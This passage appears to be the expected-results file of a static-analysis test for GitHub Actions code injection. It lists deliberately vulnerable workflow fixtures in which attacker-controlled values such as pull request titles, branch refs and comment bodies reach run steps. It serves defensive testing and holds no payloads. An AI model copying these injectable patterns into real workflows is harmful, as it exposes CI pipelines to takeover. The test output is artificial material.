.github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | -| .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | -| .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | -| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | -| .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | ${{ github.event.review.body }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | -| .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | -| .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | -| .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | -| .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | -| .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | -| .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | -| .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | -| .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | -| .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | -| .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | -| .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | -| .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | -| .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | -| .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | -| .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | -| .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | ${{ github.head_ref }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | -| .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-2.yml:10:15:10:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | .github/workflows/reusable-workflow-caller-2.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | ${{ env.log }} | .github/workflows/reusable-workflow-caller-2.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | .github/workflows/reusable-workflow-2.yml:45:24:45:61 | github.event.changes.title.from | .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | ${{ env.prev_log }} | .github/workflows/reusable-workflow-caller-2.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | ${{ steps.source.outputs.value }} | .github/workflows/self_needs.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | ${{ needs.test1.outputs.job_output }} | .github/workflows/self_needs.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | ${{ steps.step.outputs.value }} | .github/workflows/simple2.yml:3:6:3:24 | pull_request_target | pull_request_target | -| .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/simple3.yml:2:3:2:14 | workflow_run | workflow_run | -| .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | ${{ toJSON(github.event) }} | .github/workflows/simple3.yml:2:3:2:14 | workflow_run | workflow_run | -| .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | .github/workflows/slash_command2.yml:11:9:20:6 | Uses Step: command | .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | ${{ steps.command.outputs.command-arguments }} | .github/workflows/slash_command2.yml:2:5:2:17 | issue_comment | issue_comment | -| .github/workflows/test1.yml:27:20:27:39 | env.ISSUE_KEY | .github/workflows/test1.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test1.yml:27:20:27:39 | env.ISSUE_KEY | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test1.yml:27:20:27:39 | env.ISSUE_KEY | ${{ env.ISSUE_KEY }} | .github/workflows/test1.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | .github/workflows/test2.yml:17:9:25:6 | Uses Step: changed | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | ${{ steps.changed.outputs.locale_files }} | .github/workflows/test2.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | .github/workflows/test2.yml:29:9:37:6 | Uses Step: changed2 | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | ${{ steps.changed2.outputs.locale_files }} | .github/workflows/test2.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | .github/workflows/test3.yml:13:9:21:2 | Uses Step: issue_body_parser_request | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | ${{ needs.parse-issue.outputs.payload }} | .github/workflows/test3.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | ${{ toJSON(github.event.comment) }} | .github/workflows/test4.yml:3:3:3:15 | issue_comment | issue_comment | -| .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | ${{ toJSON(github.event.issue) }} | .github/workflows/test4.yml:3:3:3:15 | issue_comment | issue_comment | -| .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | ${{ toJSON(github.event) }} | .github/workflows/test4.yml:3:3:3:15 | issue_comment | issue_comment | -| .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | ${{ toJSON(github.event.comment.body).foo }} | .github/workflows/test5.yml:3:3:3:15 | issue_comment | issue_comment | -| .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | .github/workflows/test7.yml:9:9:13:6 | Uses Step: comment-branch | .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | ${{ steps.comment-branch.outputs.head_ref }} | .github/workflows/test7.yml:2:5:2:17 | issue_comment | issue_comment | -| .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | .github/workflows/test7.yml:13:9:17:6 | Uses Step: refs | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | ${{ steps.refs.outputs.head_ref }} | .github/workflows/test7.yml:2:5:2:17 | issue_comment | issue_comment | -| .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/test8.yml:3:3:3:21 | pull_request_target | pull_request_target | -| .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/test8.yml:3:3:3:21 | pull_request_target | pull_request_target | -| .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | ${{ steps.issue_body_parser_request.outputs.payload }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | ${{ needs.parse-issue.outputs.payload }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | ${{ fromJson(needs.parse-issue.outputs.payload) }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | ${{ fromJson(needs.parse-issue.outputs.payload).version }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | ${{ fromJson(needs.parse-issue.outputs.payload).version }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | ${{ github.event.issue.title }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | .github/workflows/test11.yml:22:9:30:6 | Uses Step | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | ${{ needs.get-artifacts.outputs.pr_num }} | .github/workflows/test11.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/test11.yml:55:20:55:57 | needs.get-artifacts.outputs.ref | .github/workflows/test11.yml:22:9:30:6 | Uses Step | .github/workflows/test11.yml:55:20:55:57 | needs.get-artifacts.outputs.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test11.yml:55:20:55:57 | needs.get-artifacts.outputs.ref | ${{ needs.get-artifacts.outputs.ref }} | .github/workflows/test11.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | ${{ github.event.pull_request.title \|\| "foo" }} | .github/workflows/test12.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | ${{ github.event.changes.body.from }} | .github/workflows/test13.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | ${{ github.event.changes.title.from }} | .github/workflows/test13.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | ${{ github.event.changes.head.ref.from }} | .github/workflows/test13.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | ${{ toJson(github.event.changes) }} | .github/workflows/test13.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | .github/workflows/test14.yml:14:14:15:117 | echo "files=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_OUTPUT"\n | .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | ${{ steps.changed-files.outputs.files }} | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | .github/workflows/test14.yml:24:14:26:52 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "files=${FILES}" >> "$GITHUB_OUTPUT"\n | .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | ${{ steps.changed-files.outputs.files }} | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | .github/workflows/test14.yml:35:14:36:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | ${{ env.CHANGED-FILES }} | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | .github/workflows/test14.yml:45:14:47:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | ${{ env.CHANGED-FILES }} | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | .github/workflows/test15.yml:11:14:12:103 | echo "title=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_OUTPUT"\n | .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | ${{ steps.title.outputs.title }} | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | .github/workflows/test15.yml:18:14:20:53 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "title=$PR_TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | ${{ steps.title.outputs.title }} | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test15.yml:28:21:28:36 | env.TITLE | .github/workflows/test15.yml:26:14:27:100 | echo "TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:28:21:28:36 | env.TITLE | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:28:21:28:36 | env.TITLE | ${{ env.TITLE }} | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test15.yml:36:21:36:36 | env.TITLE | .github/workflows/test15.yml:33:14:35:50 | PR_TITLE=$(jq --raw-output .pull_request.title 